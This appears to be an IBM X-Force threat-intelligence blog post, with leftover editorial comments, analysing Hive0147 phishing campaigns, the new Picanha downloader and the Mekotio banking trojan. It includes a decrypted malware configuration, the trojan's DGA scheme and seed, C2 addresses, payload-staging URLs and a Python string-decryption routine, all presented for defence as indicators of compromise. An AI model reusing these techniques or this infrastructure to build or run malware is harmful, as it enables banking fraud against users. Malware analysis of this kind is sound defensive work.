October 25, 2024 By nathan.toledo@ibm.com 17 min read

Hive0147 Serving Juicy Picanha With a Side of Mekotio

IBM X-Force tracks multiple threat actors operating within the flourishing Latin American (LATAM) threat landscape. X-Force has observed Hive0147 to be one of the most active threat groups operating in the region, targeting employee inboxes at scale, with a primary focus on phishing and malware distribution.

After a 3-month break, Hive0147 returned in July with even larger campaign volumes, and the debut of a new malicious downloader X-Force named “Picanha”, likely under continued development., deploying the Mekotio banking trojan. Hive0147 also distributes other banking trojans, such as Banker.FN also known as Coyote, and is likely affiliated with several other Latin American cybercrime groups operating different downloaders and banking trojans to enable banking fraud. 

Key Findings: 

  • Hive0147 is one of the most active URL-based phishing threat actors targeting LATAM
  • Malware distributed by Hive0147 has led to a variety of banking trojans, including Banker.FN and Mekotio
  • X-Force discovered a new two-stage downloader named Picanha, which was used to facilitate a Mekotio infection
  • The Mekotio variant observed by X-Force targets a multitude of banking applications and uses DGA to resolve its C2 servers

LATAM Digital Landscape 

LATAM has increasingly become a highly targeted cyber threat landscape, and specifically in Brazil and Mexico, where economies and industries show strong development. Evolving digital landscapes can be seen expanding into government services and financial technologies, including mobile banking. The 2023 Latin America E-commerce Blueprint found that e-commerce will steadily grow at least annually by 20% due to improved technology, innovations from online platforms, and the adoption of alternative payment methods. In 2023, 71% of adults in the region had a financial account, and it is estimated that between 2023 and 2026, 33 million new users will use the internet for the first time. E-commerce in LATAM, including retail and other sectors like tax payments, fees and licenses, bill payments, and government services, dominate with 70% of e-commerce transactions conducted over mobile channels since 2020. Conducting transactions over mobile channels gives users the flexibility to store user credentials in digital wallets and initiate real-time bank transfers. For example, Brazil’s ‘Pix’ payment platform accounts for 16% of the region’s e-commerce transaction volume. By 2026, it is estimated that Pix growth will account for 38% of online sales. With increasing digital developments in LATAM, specifically with e-commerce platforms, IBM X-Force assesses malware distributors such as Hive0147 are taking advantage of the growth. Malware distributors operating within LATAM are increasing phishing campaign delivery in hopes of obtaining credentials, specifically banking credentials, for monetary gain. Throughout 2023, LATAM remained a highly impacted region, accounting for 12% of incident response cases supported by IBM X-Force. In 2023, entities and users [AS1] in Brazil were most frequently targeted, making up 68% of all cases that IBM X-Force responded to in LATAM, while users in Colombia accounted for 17%, and users in Chile 8%.

IBM X-Force tracks several threat actors operating in LATAM, although attribution and clustering can be difficult due to overlapping tactics, techniques, and procedures (TTPs). Phishing campaigns within the LATAM region typically contain themes related to public service, government, taxes, and invoices, with the email bodies including either Portuguese or Spanish language content. Often, infection chains consist of multiple stages, starting with either PDF lures or URLs. Cloud-hosted payloads commonly observed in campaigns use platforms such as Azure blob (blob.core.windows.net), Azure (cloudapp.azure.com), Firebase dynamic links, GoDaddy (host.secureserver.net) and Google Cloud Run (app.goo.gl). When users click on one of the provided links, they are redirected and initiate the download of a ZIP archive file. Depending on the campaign, X-Force notes the ZIP files might contain one of the following file types: MSI, EXE, CMD, HTA or VBS. Executing the ZIP file starts the infection chain, with some distributors being partial to specific malwares such as BlotchyQuasar (Hive0129), Guildma and some Grandoreiro operators, while others use different payloads and a variety of forks. Frequently, email campaigns containing redirect links are geofenced, requiring the user to access the links within a specific LATAM country (most commonly Brazil, Mexico, or Colombia).

Hive0147 is one of the most active banking malware distributors IBM X-Force observes that currently operates in LATAM. IBM X-Force has been tracking a steady influx of campaigns grouped under Hive0147 delivering the banking trojan Banker.FN, as well as a new Golang-based downloader we’ve named “Picanha,” deploying the well-known Mekotio banking trojan. Although we do not attribute this new downloader to Hive0147 specifically, IBM X-Force assesses that LATAM distributors operate under a similar model as other cybercrime groups, with affiliate groups specializing in spamming, malware staging or crypting, and banking trojan operations and monetization.

Hive0147 Distribution Activity

Most of Hive0147’s emails are sent from French IP addresses, although there has been a recent shift to emails almost exclusively being sent from Dutch IP addresses. Shifting the location of sender IP addresses may be an attempt to evade detection and bypass security, prevent IP blocking, or make attribution difficult. Interestingly, of the campaign activity observed since January, IBM X-Force found that about half of the emails have a successful DomainKey Identified Mail (DKIM) verification. DKIM is a method in which signatures are used to verify the authenticity of an email message to ensure that it did not change during transit. Emails with successful DKIM checks may have a higher likelihood of not being flagged as spam. For Hive0147, failed DKIM checks may have been a misconfiguration on the actor’s part, or the result of using different services or infrastructure that do not support DKIM.

During phases of activity, IBM X-Force has observed Hive0147 exhibit a significantly higher volume of activity compared to other LATAM malware distributors. Since January 2024, IBM X-Force notes that activity attributed to Hive0147 occurs on all days during the week; however, activity mainly occurs Monday to Thursday, with 80% of campaign emails sent on these days. Interestingly, from April to July, we saw an almost complete stop in [AS2] activity, which may be the result of higher-than-normal domestic travel. Brazil’s travel industry is growing rapidly, which can be seen in the increase in both domestic and international air traffic. The National Civil Aviation Agency (ANAC) reported a significant increase in flight passenger traffic of 4.4% between January and June 2024, recording 56.2 million passengers. In addition, the International Air Transport Association (IATA) reported that in July 2024, domestic tourism in Brazil grew a substantial 8.9%. [JR3] [MF4] 

Figure 1 Hive0147 Active Campaign Days

Figure 2 Hive0147 Top Six IP Usage by Country

Figure 3 Hive0147 DKIM Success and Permanent_error

Hive0147 and Banker.FN

IBM X-Force has been tracking and clustering a series of campaigns as Hive0147 since 2023[JR5] [GM6] , which have been delivering the banking trojan Banker.FN. Banker.FN is a .NET-based banking trojan first reported in early 2023, with activity dating back to at least September 2022. Since then, Banker.FN has received several updates with added functionality.

Banker.FN is able to:

  • Exfiltrate sensitive information
  • Enumerate active banking websites
  • Display fake logins and multi-factor authentication windows 

IBM X-Force attributes campaigns delivering Banker.FN to Hive0147 with medium confidence, as activity can be difficult to delineate from other LATAM distributors due to TTP overlaps. IBM X-Force considers the reported Banker.FN campaigns from July 2023 to likely November 2023 as Hive0147 operations. 

Campaign Elements Between July-November 2023:

EmailsCloud-hosted Payloads ZIP DownloadUse of Electron AppInstallerNIM LoaderFilenames
Sent during the week (either by X-Force observance or via ZIP file compile dates)X-Force observed goo.gl URLs or unknownYesYesNSIS transition to SquirrelYesAll similar containing variations and combinations of  “PDF, Fatur, Mensal, doc”
Scroll to view full table

Distribution Disguised as Electron App

In late July-August 2023, X-Force observed Banker.FN version 1.0.0.89 being distributed in high-volume email campaigns. Campaigns were active during the weekdays, targeting users in Brazil with emails written in themes related to invoices and deliveries. Emails contained an embedded “app.goo[.]gl” link, redirecting users to Firebase dynamic links to download a malicious Electron app acting as a loader. Upon installation, the loader goes through several infection stages including a Nim-compiled crypter to stealthily inject the final payload. The banking trojan is then able to exfiltrate sensitive information, enumerate active banking websites, and display fake logins and multi-factor authentication windows. 

[AS7] [GM8] 

Figure 4 Examples of Fake Multi-Factor Authentication Windows

Abusing the Squirrel Installer

IBM X-Force observed the distribution of Banker.FN again in late August 2023, this time delivered via DocuSign. Although emails were sent Friday-Monday, most emails were delivered on Friday. The campaign targeted Portuguese-speaking users and directed the recipient to review and sign a document by clicking on a Firebase dynamic link. The victim is then redirected to a dropper site, which upon resolving the domain will download a ZIP file on to the victim machine. The downloaded ZIP archive contains an executable posing as a PDF file, which is a malicious Electron app built into a Squirrel.Windows installer. Upon execution, it installs its malicious components, establishes persistence, detects virtual environments, and decrypts the next stage before executing it via DLL hijacking. 

Figure 5 Sample Email

The Electron app built into a Squirrel.Windows installer is a slight change from the previous campaign, where the Electron app was built into an NSIS installer. The app, however, is built the same and contains an obfuscated Javascript installer to check for common virtual machine environments before establishing persistence and decrypting an archive containing another trojanized application. The trojanized application executes a legitimate executable, which in turn executes a bloated malicious loader via DLL hijacking, continuing the attack execution. This campaign continues with the use of a Nim-compiled loader using more advanced techniques such as direct syscalls. 

Further reports made public in February and July 2024, detail campaigns likely occurring in late-2023 delivering a purported new malware named “Coyote,” however, the malware is a banking trojan first discovered by ESET called Banker.FN. The infection chain in both campaigns involve the Squirrel installer for malware distribution, as well as NodeJS, and Nim Loader. 

“Picanha” and The Role of Downloaders in the Banking Trojan Ecosystem

The ecosystem of LATAM banking trojans is unique in comparison to other cybercrime operations. It is one of the only regions in which banking trojans are still used heavily to commit banking fraud, while most other banking trojans have since moved on to become backdoors and botnets to furnish ransomware attacks. The threat groups operating out of LATAM and Spain also display a high degree of cross-group collaboration, while sticking to their tried-and-true techniques, seldom found in other regions. Although this does help to quickly identify a “Latin American banking trojan” group or campaign, attribution is often very challenging due to the strong overlaps. Different malware strains will often use similar string encryption algorithms, and several banking trojans are believed to be operated as Malware-as-a-Service or have several independently developed and operated forks. The same applies to the malware distributors, which mainly rely on shared techniques such as public cloud hosting, and phishing emails containing PDFs and malicious URLs to download ZIP archives containing the first stage malware. 

In most cases, the first stage is a downloader type malware. These come in all shapes and sizes and can have varying levels of complexity. A large portion of downloaders are script based, often featuring lengthy infection chains comprised of scripts including Batch, JavaScript, Visual Basic Script or PowerShell, and the scripts themselves may also be embedded in files such as HTML, LNK (Guildma especially), or MSI installers. The more complex downloaders often support some very basic enumeration on the host, which they pass back to their C2/download server, in order to notify the operators of the potential value of an infection. One example is the Grandoreiro downloader, a member of the Grandoreiro family which features its own string encryption and performing detailed enumeration before downloading the main banking trojan.

Other downloaders are more generic but are also used to download banking trojans such as Grandoreiro. What the latter have in common is that they almost always download a full archive containing a legitimate application, with the malware hidden in a trojanized DLL which is loaded by the application upon execution. The reason for this method of packaging and distribution is so that any potentially suspicious activity performed by the banking trojan to appears to EDR solutions as if it is coming from a legitimate executable’s process. This recurring technique is characteristic of the LATAM ecosystem and has been a distinctive feature for several years. In mid-2024, IBM X-Force observed a campaign delivering a new downloader exhibiting the same characteristics. X-Force named the new Golang-based downloader “Picanha.”

The Picanha downloader is the next evolution of this malware type, offering enhanced features such as supporting more download URLs, reliable encryption, and a more sophisticated in-memory execution mechanism, surpassing previous downloader capabilities. However, the builder for Picanha, which is responsible for creating the random function names and other values, is likely still under development. Frequent code changes, such as bugfixes, and the presence of unused configuration values, may further indicate that future versions could include additional features such as persistence for the downloaded payload. 

Picanha downloader

In July 2023, IBM X-Force observed an email campaign using the new Golang-based downloader Picanha to deliver the Mekotio banking trojan. The initial phishing email is in Portuguese and targets employees informing them of an apparent change in the number of vacation days they have. This theme directly threatening employees’ well being and the sense of urgency may lead to victims impulsively clicking on the included URL to view the changes. 

Figure 6 Sample Phishing Email

As in previous campaigns targeting LATAM entities, the URL uses Google’s Cloud Run service and redirects victims to a site to download a ZIP file containing a malicious executable. The new Golang-based malware “Picanha downloader” consists of two stages. 

Stage 1

Notably, the first stage of the Golang executable contains original function names; however, these have been selected randomly for each sample based on a Portuguese wordlist:

Figure 7 Wordlist

First, Picanha begins by executing a function designed to imitate the Sleep command. The function calculates the elapsed time and performs random calculations until a randomly chosen threshold is reached. The calculation time varies from 25 seconds to 3 minutes. This technique is likely to hinder or slow down detection engines which are often able to hook the Sleep API and skip the dormant functionality.

Then, Picanha decrypts its configuration, which is stored as a hardcoded hex string encrypted with AES-256-GCM. 

Figure 8 Encrypted Configuration

The decrypted configuration string contains values delimited by the characters “#” and “|”:

dyicn.ofertadsn.com.br#hzfzx.khadicomunicacao.com.br#zpguk.cozinhaofertas.com#ljoea.curasdanatureza.com#tjqty.deccsmagazine.com.br#sohye.topracoes.com#jmaah.clicktelefoniaempresarial.com.br#izlhu.ometodoseroficial.com#khqry.vitapronobisfassolution.com.br#olukv.familyrealstore.com#################|C:\Program Files\Topaz OFD\Warsaw|reg=Software\Microsoft\Windows\CurrentVersion\Run|\Microsoft\Windows|secretores
Scroll to view full table

The decrypted configuration consists of:

  • 10 different download domains
  • The file path of Topaz OFD – an online banking security app popular in Latin America
  • A registry key commonly used for persistence – currently unused
  • The relative path “\Microsoft\Windows” – currently unused
  • A random word used as the name of the folder to store the payload

Picanha will then create a new folder in a randomly chosen folder within the %LOCALAPPDATA% directory. For the analyzed sample based on the above config, the folder would be named “secretores.” 

Next, the malware enters a loop and attempts to connect to each of the 10 embedded download domains until one is successful. Between the requests, the malware sleeps in random intervals. For each domain, it constructs a full URL and attempts to download a payload. If the request is successful, it will parse the payload as a ZIP archive and extract the contents into the newly created directory. 

Figure 9 Loop Attempting Connections to Embedded Domains

After that, the malware checks for the presence of the Topaz OFD banking security protection module is installed by verifying if the path “C:\Program Files\Topaz OFD\Warsaw” exists on the system. Depending on the result, Picanha issues a second HTTP GET request to the following URL using the same domain as for the ZIP download:

https://<domain>/N -> Not installedhttps://<domain>/S -> Installed
Scroll to view full table

Finally, Picanha launches the main executable which was extracted from the ZIP archive. As often seen with infection chains of related banking trojans, the main executable is a legitimate application which loads a trojanized DLL, in this case, named NsBars.dll

In the example above, the extracted archive contains innocuous files related to the legitimate application and the following three files used for the next steps of the infection chain:

Relative pathDescriptionSHA256
.\Textoescritor.exeLegitimate application39222481d69aa4d92a5c4d5c094a86909ebff762f6336f1a186fa94d3cc01012
.\bin\NsBars.dllMalicious DLL (Picanha Stage 2), replacing the original NsBars.dll4e62a102a00b071ee9f7b7e6ace0d558e18ba1a61a937676c4460a0f33a3e87e
.\wFHYfjQNzkoG.datEncrypted Mekotio payload18b09a8dfb6b553f355382127a67ad1ba5909b442e0e9fadb7ebd7d89675ea9b
Scroll to view full table

Picanha’s first stage terminates after executing Textoescritor.exe. The legitimate application goes on to load a series of user DLLs from the “bin” subdirectory, including the trojanized NsBars.dll. When NsBars.dll is loaded, the export function “BarCreate” is called. The code in this function is responsible for executing the second stage of Picanha. 

Stage 2

Picanha’s second stage starts with the decryption of the final payload (Mekotio), which requires two arguments to proceed:

  1. The filename of the encrypted payload “wFHYfjQNzkoG.dat”
  2. A decryption password “hNWzPAsZVruI”

The final payload is decrypted in memory using the SHA256 hash of the password as a key for the AES-256-GCM algorithm. 

Finally, the address of the decrypted Mekotio payload is passed to a loader function to manually map the binary into a new buffer in memory and resolve its imports. The loader function retrieves the entry point of the Mekotio payload and transfers execution to it.

Mekotio banking trojan

The Mekotio banking trojan is a Delphi-compiled executable, in this case a 64-bit DLL. Execution begins in the main class with the FormCreate function which attempts to retrieve handles to the following DLLs used by banking security applications: 

wslbscr32.dllwslbscrwh32.dllRapportGH.dllrooksbas.dllrooksdol.dll
Scroll to view full table

If they were already loaded into memory, Mekotio would attempt to unload the DLLs by calling DllMain with the DLL_PROCESS_DETACH parameter. However, a simple error in the code causes this functionality to fail due to to an encrypted string missing its decryption function:

Figure 10 Decryption Function

The next interesting piece of code uses SetSecurityInfo to modify the discretionary access control list (DACL) of its process, setting it to a new empty DACL. 

Figure 11 Empty DACL

This prevents Windows 7 users from using Windows Task Manager to terminate the process.

Figure 12 Error Message

However, users can still terminate the process from Administrator mode in the Task Manager and the technique does not work in Windows 8.1 and above. 

Mekotio also loads two DLLs needed during execution, “Magnification.dll” and “dwmapi.dll”. Finally, the malware begins its enumeration procedure and initiates command and control (C2) communication. Like most other Delphi-based banking trojans, the different classes and functions implementing the various features of the malware are scheduled via Delphi Timer objects. 

Persistence

Upon execution Mekotio establishes persistence using a registry key. It writes the path of the running executable (the legitimate binary loading the Picanha stage 2 DLL) to the following key, causing Mekotio to execute immediately after every login. At the same time a file “maisum2.dat” is dropped into the current directory, as an indicator that persistence was established successfully.

HKEY_CURRENT_USER\Environment\UserInitMprLogonScript
Scroll to view full table

In addition, Mekotio is able to accept a C2 command requesting to establish persistence through another registry key. In that case, the banking trojan runs cmd.exe with the “REG ADD” command to write the same path to:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Scroll to view full table

Command and control

Mekotio begins its first C2 connection with an HTTP POST request, sending an encrypted string containing basic enumeration data on the newly infected client. For example:

dqbw802=7mvejj3zfwoD5880AhFzv62fA3n7sz8oB4nBoAB3Da&Bcdv2=D929321e3a0651A0ae94b2979e&by4ps8=067DAF75a59388eb63d56AD1474EB73F&40z0uuE=9034F4&y1ry=86FD5dF9&h5i2c8cD3=F37c8880819a78d86bF55BE04e&5c9mt=&zwCbcq=6E8389839392D52FEA31D356C73bA429ac53&83whhjc=&
Scroll to view full table

The data is formatted using the following pattern:

<random_string>=<value1>&<random_string>=<value2>&<random_string>=<value3>…
Scroll to view full table

The first value is a randomly generated 42-character key, which decrypts all other values using the standard Mekotio string encryption algorithm. The encrypted values contain the following system information:

  • Computer name
  • Username
  • Windows version
  • Mekotio version string “D22”
  • Installed security software (Topaz OFD, Trusteer, Banco Bradesco “Componentes de Segurança”)
  • Installed anti-virus software

The analyzed sample does not contain a valid URL, which in turn causes the C2 request to fail. As often observed in related banking trojans, this might well be a deprecated functionality not properly cleaned up.

DGA

The rest of the banking trojan’s functionality may use a choice of two different DGA mechanisms to generate a domain and resolve its C2 server. Afterwards, the actual Mekotio C2 communication is performed via Windows Sockets.

The first DGA mechanism, when the DGA mode configuration value is set to 1, generates a new domain based on the following data:

  1. Day of the month
  2. Month of the year
  3. Hardcoded seed “mkro”

The resulting strings are then concatenated. For September 16th for instance, the result is “1609mkro.”

For a DGA mode set to 2, Mekotio also incorporates the hour of the day within a specific period. The following time frames are mapped to a specific string:

Time is less thanMapped string
07:00:00“AM01”
08:00:00“AM02”
09:00:00“AM03”
10:00:00“AM04”
11:00:00“AM05”
12:00:00“AM06”
13:00:00“PM01”
14:00:00“PM02”
15:00:00“PM03”
16:00:00“PM04”
17:00:00“PM05”
18:00:00“PM06”
Scroll to view full table

The second DGA method uses the provided string to concatenate the following data:

  1. Day of the week
  2. Day of the month
  3. Timeframe string
  4. Hardcoded seed “mkro”

As a result, the second DGA method would form the string “MON16AM04mkro” for the date and time “September 16th at 09:42.”

From this point, both methods are the same. They generate an MD5 hash of the concatenated string and use the first 20 characters as a subdomain. The apex domain is retrieved using a list that corresponds to the current day of the month:

01 blogdns[.]com02 blogdns[.]net03 blogdns[.]org04 blogsite[.]org05 webhop[.]biz06 webhop[.]info07 dnsalias[.]com08 dnsalias[.]net09 dnsalias[.]org10 dnsdojo[.]com11 doesntexist[.]com12 doesntexist[.]org13 dontexist[.]com14 dontexist[.]net15 dontexist[.]org16 doomdns[.]com17 doomdns[.]org18 dvrdns[.]org19 dyn-o-saur[.]com20 dynalias[.]com21 dynalias[.]net22 dynalias[.]org23 dynathome[.]net24 endofinternet[.]net25 endofinternet[.]org26 endoftheinternet[.]org27 webhop[.]org28 issmarterthanyou[.]com29 neat-url[.]com30 from-ks[.]com31 dyndns-remote[.]com
Scroll to view full table

For both methods explained above, the final C2 domains are:

3cd99dd0981c76e5a7b9[.]doomdns[.]com4e342df890dd9fb169e0[.]doomdns[.]com
Scroll to view full table

Mekotio also supports a C2 mode of 0, which is likely meant as a fallback or testing channel, and contains a hardcoded IP address to be used as C2 server:

177.235.219[.]126
Scroll to view full table

Behavior

Just like most other banking trojans, all specific functionality of Mekotio requires sensitive strings. These are decrypted at runtime to avoid static detections. Mekotio uses an old algorithm which is among the most common ones in LATAM banking trojans, and has been used as such or in slight variations with other bankers including Grandoreiro, Ousaban and Astaroth/Guildma. It has been documented numerous times before, but the following is an example Python implementation:

def decrypt(ct, key):    plaintext = “”    ct = bytes.fromhex(ct)    for i in range(1, len(ct)):        n = ct[i] ^ key[(i-1) % len(key)]        c = ct[i-1]        c = n – c if c < n else n + int(0xff) – c        plaintext += chr(c)    return plaintext
Scroll to view full table

The main objective of Mekotio or any other LATAM banking trojan is to discover the use of banking applications and attempt to manipulate the apps, web apps or the users themselves to commit banking fraud. The initial discovery of targeted banking applications, the banking trojans include a list of strings containing the names of common financial institutions and their related apps. This list is constantly compared against any open windows on the infected machine. If there is a match, the banking trojan will inform the operator which exact application is used. Mekotio contains the following list indicating a clear targeting towards banking apps used throughout LATAM:

BancoDaycovalBancoMercantilCCBBrasilagibankaplicativoitaasaasatendimentoitabadesulbancoalfabancobmgbancobradescobancobs2bancodaamazoniabancodobrasilbancodoestadodoparbancodonordestebancointerbancoitabancomercantilbancooriginalbancorendimentobancotopaziobancovotorantimbanesedoseujeitobanestesbanrisulbbcombrbdmgdigitalbinancebitcointradebitfinexbitprecobitstampblockchainbnb.gov.brbradescobraziliexbrbbanknetcitibankciviacontaonlinecontasimplescoopcredcoracredinetcredisiscreditrancredsiscresolinternetbankinggerenciadorfinanceirohomebankinternetbanking.banparainternetbankingcaiitauaplicativo.exelogincaixaloginxmercadobitcoinmercadopagonavegadorexclusivopaguevelozpicpaypoloniexprimebitprimexbtpro.bitcointoyourecargapaysafranetbankingsantandsicoobsicredisisprimesisprimesofisastonetribancounicreduniprimeviacrediwise
Scroll to view full table

When one of the referenced banking applications is detected, Mekotio can handle specific commands. These commands implement the following functionality:

  • Lock the applications window to prevent users from exiting
  • Grab input from the window, which might include credentials and tokens
  • Create a fake window imitating the banking application to capture credentials or tokens
  • Display or capture a QR code, which may be used to circumvent multi-factor authentication (MFA)
  • Display a token again to circumvent MFA

Mekotio contains several images designed to imitate banking applications:

Figure 13 Readily Available Application Images

Figure 14 Readily Available Application Images

Figure 15 Readily Available Application Images

Figure 16 Readily Available Application Images

In addition, Mekotio supports a list of further commands to control the infected machine, including commands to:

  • Send keystrokes, mouse movement, clicks or scrolls
  • Display windows with custom text
  • Send or receive clipboard data
  • Change C2 modes
  • Beacon/Ping C2
  • Kill process “core.exe” associated with banking security software
  • Kill browsers
  • Maximize browser windows
  • Show taskbar
  • Send system enumeration data
  • Take screenshots
  • Constantly check for windows such as “Task Manager” and “Warning” and immediately close them

Another interesting functionality exhibited by Mekotio is a feature internally called “Troca sistema de lugar”, which roughly translates to “Change system location” (Portuguese machine translation). Mekotio will send an HTTP GET request to retrieve an encrypted string stored at: 

https://api.cacher[.]io/raw/484822a63a80cb632f44/3b169ddbbaa8dcf4255c/my
Scroll to view full table

The string contains a key and encrypted data between hardcoded separators, which reveal a list of further download URLs hosted on Google Firebase:

https://firebasestorage[.]googleapis[.]com/v0/b/drop-a82ec.appspot.com/o/fire.txt?alt=media&token=096bbc3c-d9eb-4010-a8c7-36d51874bff7https://firebasestorage[.]googleapis[.]com/v0/b/drop-a82ec.appspot.com/o/fire?alt=media&token=8c582627-8a00-4e3d-9bc5-9b657ad0f135
Scroll to view full table

Both URLs host the same 40KB JSON file. Mekotio downloads this file as part of the next stage of the process. 

Figure 17 JSON File Contents

The JSON file contains two lists, “diretorioraiz” and “nomesdiretorio.” The former contains four system directories, and the latter is what appears to be a large list of folder names related to video games. Although the exact purpose of this contents is not clear, Mekotio appears to randomly select and create a folder from the list and copy its archive to the new location. Afterwards, it re-establishes persistence through the registry run key. 

Conclusion:

Hive0147 is just one of dozens of malware distributors enabling the cybercrime ecosystem in LATAM. IBM X-Force is observing an increase in threats targeting the region with newly developed malware such as Picanha, and high volumes of phishing campaigns. Ultimately, the close collaboration between LATAM cybercrime groups should urge defenders to collaborate just as closely. By making full use of threat intelligence to stay informed about the latest threats and best practices, individuals and organizations can mitigate the risks associated with banking trojans and protect themselves from financial loss. To combat these threats and ensure a secure digital future for the region requires a strong cooperation between governments, financial institutions, law enforcement, and security researchers.

Technical recommendations:

IBM X-Force encourages organizations that may be impacted by these campaigns to review the following recommendations:

  • Exercise caution with emails and PDFs prompting a file download
  • Monitor emails for URLs abusing cloud service domains such as “app.goo.gl” for phishing
  • Monitor registry Run keys used for persistence
  • HKEY_CURRENT_USER\Environment\UserInitMprLogonScript
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • Consider blocking pre-calculated DGA domains via DNS
  • Install and configure endpoint security software
  • Update relevant network security monitoring rules
  • Educate staff on the potential threats to the organization

Indicators of compromise:

IndicatorIndicator TypeContext
https://yhv6e.app.goo[.]gl/ASmaxYfRW4Eh9j34AURLHive0147 phishing URL
https://xek99.app.goo[.]gl/g21ytBravSMDQb7H6URLHive0147 phishing URL
d5800c06fe27cf0c6858ea7e02c8b2d35d7a76a93077f9ca6e41878603c38ef3SHA256Picanha Downloader stage 1
olukv[.]familyrealstore[.]comDomainPicanha download domain
khqry[.]vitapronobisfassolution[.]com[.]brDomainPicanha download domain
izlhu[.]ometodoseroficial[.]comDomainPicanha download domain
jmaah[.]clicktelefoniaempresarial[.]com[.]brDomainPicanha download domain
sohye[.]topracoes[.]comDomainPicanha download domain
tjqty[.]deccsmagazine[.]com[.]brDomainPicanha download domain
ljoea[.]curasdanatureza[.]comDomainPicanha download domain
zpguk[.]cozinhaofertas[.]comDomainPicanha download domain
hzfzx[.]khadicomunicacao[.]com[.]brDomainPicanha download domain
dyicn[.]ofertadsn[.]com[.]brDomainPicanha download domain
39222481d69aa4d92a5c4d5c094a86909ebff762f6336f1a186fa94d3cc01012SHA256Legitimate application
4e62a102a00b071ee9f7b7e6ace0d558e18ba1a61a937676c4460a0f33a3e87eSHA256Picanha stage 2 DLL
18b09a8dfb6b553f355382127a67ad1ba5909b442e0e9fadb7ebd7d89675ea9bSHA256Encrypted Mekotio payload
6a5db2fe1deabd14864a8d908169e4842c611581bdc3357fa597a8fbbc37baf6SHA256Decrypted Mekotio banking trojan
3cd99dd0981c76e5a7b9[.]doomdns[.]com DomainMekotio example DGA domain
4e342df890dd9fb169e0[.]doomdns[.]comDomainMekotio example DGA domain
177.235.219[.]126IPMekotio fallback C2 server
https://api.cacher[.]io/raw/484822a63a80cb632f44/3b169ddbbaa8dcf4255c/myURLMekotio component download URL
https://firebasestorage[.]googleapis[.]com/v0/b/drop-a82ec.appspot.com/o/fire.txt?alt=media&token=096bbc3c-d9eb-4010-a8c7-36d51874bff7 URLMekotio component download URL
https://firebasestorage[.]googleapis[.]com/v0/b/drop-a82ec.appspot.com/o/fire?alt=media&token=8c582627-8a00-4e3d-9bc5-9b657ad0f135URLMekotio component download URL[JR9] 
Scroll to view full table

 [AS1]Entities or Users?

 [AS2]Complete drop or a complete stop? Can you have a complete drop?

 [JR3]Does this seem extraneous? Do we need the air travel data to make this point? Seems a bit random/tack-on.

 [MF4]Put this in there to support the assessment.

 [JR5]Is this supposed to be 2023? Or something else?

 [GM6]Typo fixed

 [AS7]Are Trusteer aware of this use?

 [GM8]If I remember correctly they have been made aware when the Flash went out in 2023, and in a previous blog as well I believe

 [JR9]How is/are this data set being referenced above? I’m not sure I make the connection between the table and the reccos above…do we need to be more clear about that?

More from Uncategorized

Topic updates

Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today